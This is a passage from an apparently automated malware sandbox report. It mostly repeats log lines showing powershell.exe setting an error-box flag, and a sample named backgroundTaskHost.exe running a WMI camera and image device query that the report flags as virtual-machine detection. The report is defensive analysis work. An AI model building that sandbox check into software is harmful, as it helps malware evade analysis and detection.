                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
